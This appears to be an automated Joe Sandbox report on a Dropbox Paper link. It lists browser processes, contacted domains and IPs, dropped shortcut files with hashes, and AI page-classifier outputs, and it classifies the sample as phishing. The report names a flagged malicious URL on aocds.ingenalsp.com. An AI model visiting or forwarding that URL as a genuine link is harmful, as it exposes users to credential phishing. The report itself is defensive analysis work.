    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1920,i,4067886936156697262,9130840558524630575,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.dropbox.com/l/scl/AADyLw2rXknip-xl340QrjVvZFuSmG6MEbE"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1920,i,4067886936156697262,9130840558524630575,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5784 --field-trial-handle=1920,i,4067886936156697262,9130840558524630575,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6060 --field-trial-handle=1920,i,4067886936156697262,9130840558524630575,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5784 --field-trial-handle=1920,i,4067886936156697262,9130840558524630575,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6060 --field-trial-handle=1920,i,4067886936156697262,9130840558524630575,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire Infrastructure1
    Drive-by Compromise
    Windows Management Instrumentation1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://www.dropbox.com/l/scl/AADyLw2rXknip-xl340QrjVvZFuSmG6MEbE0%Avira URL Cloudsafe
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    star-mini.c10r.facebook.com
    157.240.0.35
    truefalse
      unknown
      use1-turn.fpjs.io
      35.157.212.223
      truefalse
        unknown
        a.nel.cloudflare.com
        35.190.80.1
        truefalse
          unknown
          usersurvey.dropbox.com
          143.204.215.69
          truefalse
            unknown
            instagram.com
            157.240.252.174
            truefalse
              unknown
              api.sprig.com
              184.72.105.205
              truefalse
                unknown
                paper.dropboxstatic.com
                143.204.98.112
                truefalse
                  unknown
                  d2w650xp5tniea.cloudfront.net
                  18.245.60.3
                  truefalse
                    unknown
                    2lro.transenil.ru
                    188.114.97.3
                    truefalse
                      unknown
                      z-p42-instagram.c10r.instagram.com
                      157.240.252.174
                      truefalse
                        unknown
                        scontent.cdninstagram.com
                        157.240.253.63
                        truefalse
                          unknown
                          edge-block-previews-env.dropbox-dns.com
                          162.125.66.16
                          truefalse
                            unknown
                            aocds.ingenalsp.com
                            172.67.132.164
                            truefalse
                              unknown
                              code.jquery.com
                              151.101.194.137
                              truefalse
                                unknown
                                dropboxcaptcha.com
                                143.204.95.12
                                truefalse
                                  unknown
                                  cdnjs.cloudflare.com
                                  104.17.24.14
                                  truefalse
                                    unknown
                                    static-pdx.v.dropbox.com
                                    162.125.40.3
                                    truefalse
                                      unknown
                                      challenges.cloudflare.com
                                      104.18.94.41
                                      truefalse
                                        unknown
                                        www-env.dropbox-dns.com
                                        162.125.66.18
                                        truefalse
                                          unknown
                                          cdn.sprig.com
                                          108.139.29.78
                                          truefalse
                                            unknown
                                            www.google.com
                                            142.250.186.36
                                            truefalse
                                              unknown
                                              fp.dropbox.com
                                              3.160.150.90
                                              truefalse
                                                unknown
                                                www.facebook.com
                                                unknown
                                                unknownfalse
                                                  unknown
                                                  cfl.dropboxstatic.com
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    static.cdninstagram.com
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      www.dropboxstatic.com
                                                      unknown
                                                      unknownfalse
                                                        unknown
                                                        www.instagram.com
                                                        unknown
                                                        unknownfalse
                                                          unknown
                                                          ucb77c37fdc994de353150108ec5.previews.dropboxusercontent.com
                                                          unknown
                                                          unknownfalse
                                                            unknown
                                                            www.dropbox.com
                                                            unknown
                                                            unknownfalse
                                                              unknown
                                                              dropbox-api.arkoselabs.com
                                                              unknown
                                                              unknownfalse
                                                                unknown
                                                                NameMaliciousAntivirus DetectionReputation
                                                                https://www.dropbox.com/scl/fi/t8mwo3fusn6lwedaic7ly/AOCDS-PROPOSAL.paper?dl=0&oref=e&r=ACStGitX_sLGwJa6gY_pN_pkTWL2lJg5PAnYOijr_m3lbnycpxWpquNeoQfG37t9Qkr8gbJLdf1KC9c0MaUemOcjEKDdEgrLqzuo8tO4nPKOQlOZFAAPrg7SnTkaW2KzVclP-v3e4qKHTRb5skJS1HKLHRo_c6x5n3wJVOUe3zKmID6ezPU3UdQO0LfH3c4kZFogVcmB5T3ky4PfsUNliBpE&sm=1false
                                                                  unknown
                                                                  https://www.dropbox.com/scl/fi/t8mwo3fusn6lwedaic7ly/AOCDS-PROPOSAL.paper?oref=e&r=ACStGitX_sLGwJa6gY_pN_pkTWL2lJg5PAnYOijr_m3lbnycpxWpquNeoQfG37t9Qkr8gbJLdf1KC9c0MaUemOcjEKDdEgrLqzuo8tO4nPKOQlOZFAAPrg7SnTkaW2KzVclP-v3e4qKHTRb5skJS1HKLHRo_c6x5n3wJVOUe3zKmID6ezPU3UdQO0LfH3c4kZFogVcmB5T3ky4PfsUNliBpE&sm=1&dl=0false
                                                                    unknown
                                                                    https://aocds.ingenalsp.com/J8NtuOX/true
                                                                      unknown
                                                                      https://www.instagram.com/false
                                                                        unknown
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        142.250.185.99
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        142.250.185.206
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        142.250.186.170
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        3.160.150.90
                                                                        fp.dropbox.comUnited States
                                                                        16509AMAZON-02USfalse
                                                                        13.32.27.12
                                                                        unknownUnited States
                                                                        7018ATT-INTERNET4USfalse
                                                                        173.194.76.84
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        104.18.94.41
                                                                        challenges.cloudflare.comUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        3.160.150.129
                                                                        unknownUnited States
                                                                        16509AMAZON-02USfalse
                                                                        172.217.23.106
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        104.16.100.29
                                                                        unknownUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        157.240.252.174
                                                                        instagram.comUnited States
                                                                        32934FACEBOOKUSfalse
                                                                        157.240.253.63
                                                                        scontent.cdninstagram.comUnited States
                                                                        32934FACEBOOKUSfalse
                                                                        162.125.40.3
                                                                        static-pdx.v.dropbox.comUnited States
                                                                        19679DROPBOXUSfalse
                                                                        142.250.186.132
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        104.16.99.29
                                                                        unknownUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        151.101.194.137
                                                                        code.jquery.comUnited States
                                                                        54113FASTLYUSfalse
                                                                        35.190.80.1
                                                                        a.nel.cloudflare.comUnited States
                                                                        15169GOOGLEUSfalse
                                                                        172.217.18.110
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        66.102.1.84
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        142.250.186.35
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        142.250.185.67
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        162.125.66.16
                                                                        edge-block-previews-env.dropbox-dns.comUnited States
                                                                        19679DROPBOXUSfalse
                                                                        104.17.24.14
                                                                        cdnjs.cloudflare.comUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        142.250.185.68
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        143.204.215.69
                                                                        usersurvey.dropbox.comUnited States
                                                                        16509AMAZON-02USfalse
                                                                        1.1.1.1
                                                                        unknownAustralia
                                                                        13335CLOUDFLARENETUSfalse
                                                                        162.125.66.18
                                                                        www-env.dropbox-dns.comUnited States
                                                                        19679DROPBOXUSfalse
                                                                        142.250.186.36
                                                                        www.google.comUnited States
                                                                        15169GOOGLEUSfalse
                                                                        157.240.0.35
                                                                        star-mini.c10r.facebook.comUnited States
                                                                        32934FACEBOOKUSfalse
                                                                        104.18.95.41
                                                                        unknownUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        184.72.105.205
                                                                        api.sprig.comUnited States
                                                                        14618AMAZON-AESUSfalse
                                                                        216.58.206.68
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        143.204.98.81
                                                                        unknownUnited States
                                                                        16509AMAZON-02USfalse
                                                                        108.139.29.78
                                                                        cdn.sprig.comUnited States
                                                                        16509AMAZON-02USfalse
                                                                        239.255.255.250
                                                                        unknownReserved
                                                                        unknownunknownfalse
                                                                        188.114.97.3
                                                                        2lro.transenil.ruEuropean Union
                                                                        13335CLOUDFLARENETUSfalse
                                                                        18.245.60.3
                                                                        d2w650xp5tniea.cloudfront.netUnited States
                                                                        16509AMAZON-02USfalse
                                                                        142.250.185.195
                                                                        unknownUnited States
                                                                        15169GOOGLEUSfalse
                                                                        188.114.96.3
                                                                        unknownEuropean Union
                                                                        13335CLOUDFLARENETUSfalse
                                                                        18.245.60.46
                                                                        unknownUnited States
                                                                        16509AMAZON-02USfalse
                                                                        35.157.212.223
                                                                        use1-turn.fpjs.ioUnited States
                                                                        16509AMAZON-02USfalse
                                                                        172.67.132.164
                                                                        aocds.ingenalsp.comUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        143.204.95.12
                                                                        dropboxcaptcha.comUnited States
                                                                        16509AMAZON-02USfalse
                                                                        143.204.98.112
                                                                        paper.dropboxstatic.comUnited States
                                                                        16509AMAZON-02USfalse
                                                                        157.240.251.35
                                                                        unknownUnited States
                                                                        32934FACEBOOKUSfalse
                                                                        104.17.25.14
                                                                        unknownUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        IP
                                                                        192.168.2.16
                                                                        192.168.2.6
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1517135
                                                                        Start date and time:2024-09-24 19:13:32 +02:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                        Sample URL:https://www.dropbox.com/l/scl/AADyLw2rXknip-xl340QrjVvZFuSmG6MEbE
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:17
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • EGA enabled
                                                                        Analysis Mode:stream
                                                                        Analysis stop reason:Timeout
                                                                        Detection:MAL
                                                                        Classification:mal52.phis.win@27/235@89/297
                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe, svchost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 142.250.185.67, 173.194.76.84, 142.250.185.206, 34.104.35.123, 104.16.99.29, 104.16.100.29
                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, clientservices.googleapis.com, clients.l.google.com, cfl.dropboxstatic.com.cdn.cloudflare.net, fe3cr.delivery.mp.microsoft.com
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • VT rate limit hit for: https://www.dropbox.com/l/scl/AADyLw2rXknip-xl340QrjVvZFuSmG6MEbE
                                                                        InputOutput
                                                                        URL: https://aocds.ingenalsp.com/J8NtuOX/ Model: jbxai
                                                                        {
                                                                        "brand":["CLOUDFLARE"],
                                                                        "contains_trigger_text":false,
                                                                        "trigger_text":"",
                                                                        "prominent_button_name":"unknown",
                                                                        "text_input_field_labels":["unknown"],
                                                                        "pdf_icon_visible":false,
                                                                        "has_visible_captcha":false,
                                                                        "has_urgent_text":false,
                                                                        "has_visible_qrcode":false}
                                                                        URL: https://aocds.ingenalsp.com/J8NtuOX/ Model: jbxai
                                                                        {
                                                                        "brand":["CLOUDFLARE"],
                                                                        "contains_trigger_text":false,
                                                                        "trigger_text":"unknown",
                                                                        "prominent_button_name":"unknown",
                                                                        "text_input_field_labels":["unknown"],
                                                                        "pdf_icon_visible":false,
                                                                        "has_visible_captcha":false,
                                                                        "has_urgent_text":false,
                                                                        "has_visible_qrcode":false}
                                                                        URL: https://aocds.ingenalsp.com/J8NtuOX/ Model: jbxai
                                                                        {
                                                                        "brand":["CLOUDFLARE"],
                                                                        "contains_trigger_text":false,
                                                                        "trigger_text":"unknown",
                                                                        "prominent_button_name":"unknown",
                                                                        "text_input_field_labels":["unknown"],
                                                                        "pdf_icon_visible":false,
                                                                        "has_visible_captcha":false,
                                                                        "has_urgent_text":false,
                                                                        "has_visible_qrcode":false}
                                                                        URL: https://www.instagram.com/ Model: jbxai
                                                                        {
                                                                        "brand":["Meta"],
                                                                        "contains_trigger_text":false,
                                                                        "trigger_text":"",
                                                                        "prominent_button_name":"unknown",
                                                                        "text_input_field_labels":["unknown"],
                                                                        "pdf_icon_visible":false,
                                                                        "has_visible_captcha":false,
                                                                        "has_urgent_text":false,
                                                                        "has_visible_qrcode":false}
                                                                        URL: https://www.instagram.com/ Model: jbxai
                                                                        {
                                                                        "brand":["Instagram",
                                                                        "Google Play",
                                                                        "Microsoft"],
                                                                        "contains_trigger_text":true,
                                                                        "trigger_text":"Log in OR Log in with Facebook Forgot password? Dant have an account? Sign up",
                                                                        "prominent_button_name":"Log in",
                                                                        "text_input_field_labels":["Phone number,
                                                                         username,
                                                                         or email",
                                                                        "Password",
                                                                        "Forgot password?"],
                                                                        "pdf_icon_visible":false,
                                                                        "has_visible_captcha":false,
                                                                        "has_urgent_text":false,
                                                                        "has_visible_qrcode":false}
                                                                        URL: https://www.instagram.com/ Model: jbxai
                                                                        {
                                                                        "phishing_score":1,
                                                                        "brands":["Instagram"],
                                                                        "sub_domain":"www",
                                                                        "legit_domain":"instagram",
                                                                        "partial_domain_match":false,
                                                                        "brand_matches_associated_domain":true,
                                                                        "reasons":"The domain name 'instagram.com' fully matches the legitimate domain name associated with the identified brand 'Instagram'. The clean and minimalistic design of the page is consistent with Instagram's brand identity,
                                                                         and the option to log in with Facebook suggests a legitimate integration with Facebook.",
                                                                        "brand_matches":[true],
                                                                        "url_match":true,
                                                                        "gpto1":{
                                                                        "riskscore":1,
                                                                        "legit_domain":"instagram.com",
                                                                        "reasons":["URL matches the legitimate Instagram domain.",
                                                                        "No suspicious elements detected."]}
                                                                        ,
                                                                        "gpt4o":{
                                                                        "riskscore":1,
                                                                        "legit_domain":"instagram.com",
                                                                        "reasons":["The root domain 'instagram.com' is the legitimate domain for the brand Instagram.",
                                                                        "There are no suspicious elements in the URL.",
                                                                        "The URL matches the known legitimate domain for Instagram."]}
                                                                        ,
                                                                        "brand_input":"Instagram,
                                                                         Google Play,
                                                                         Microsoft"}
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Sep 24 16:14:07 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2673
                                                                        Entropy (8bit):3.991866727589828
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:09B9DFF8ED0189F56227AB4EE16CB4E8
                                                                        SHA1:5850F2BBB2FE1AB72D76EEFBA9222465BEEB8496
                                                                        SHA-256:DBFCD42A21E3668A26839400E3E00BA1DF7F63A7775A08EEBC9956B5AF4F0FAC
                                                                        SHA-512:CDD93C18C0A145E0791AABC3C8F11B741E235DBC0FAC73B1BE7C6E2D53FC204B652D3BB4EC38EC7D8DCCAA7D2341C2B40FDFF656252653B56AD55FB0F621936F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:L..................F.@.. ...$+.,....3..)....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I8Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V8Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V8Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V8Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V8Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........3.P......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Sep 24 16:14:07 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2675
                                                                        Entropy (8bit):4.008365973845312
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:54984351E5A1BA91880C7BA34D80A20F
                                                                        SHA1:827258782BAE072BFE57CD17D198881F5B6858B5
                                                                        SHA-256:439B8ADE58E23A4471BC1BE3AF4F432FCCBA69AD5E043C7EC9DA7A2C1AD608EB
                                                                        SHA-512:40E81E10B1806D516182D7CF016920BD83902E11950FD5898E141C56E7A2C3679EFED6ADC644CCAC162FF8DD28BC39FBF59B827848D09C89BD30E93D2419DDA0
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:L..................F.@.. ...$+.,.....R.)....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I8Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V8Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V8Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V8Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V8Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........3.P......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2689
                                                                        Entropy (8bit):4.01448835082368
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:49B0FEB5D7AC88A3FB7E5CBFA0FF3975
                                                                        SHA1:526265FC454B22385B94A94FBF9CB362AAB09346
                                                                        SHA-256:E25F7251A9023F3EAD00AC6A16F42701598AF4331FFB526502A0618E684EDCB6
                                                                        SHA-512:96F69CC687E916B06BF52FC9CEAE8CC7A7DDDAC9205EE75E1B6E4910B13F216411EF8AEB78BB67D7D0888F8F490D90989FC59A2B210D692CCBE3A877AC6E31D0
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I8Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V8Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V8Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V8Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........3.P......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Sep 24 16:14:07 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2677
                                                                        Entropy (8bit):4.007468196451484
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:8D0EEBCB9458E3E23DF34F86ED2C224B
                                                                        SHA1:AD0811DF1A01A63E1F3040B2B5F32DE18F03216D
                                                                        SHA-256:3F977A74C63F1779839B5CC88F6AB7C8769E36D097AEAA3A9D80B7C00957188E
                                                                        SHA-512:BD315D3D26759FC5F6EFAA1BBC43E28096CEACD205522A39F3FD91EBD7022427F50C57A4D5D8E41190F4C9E1BD577F255EBAF94E44CB5D5575A7EA81783435BA
                                                                        Malicious:false
                                                                        Reputation:unknown
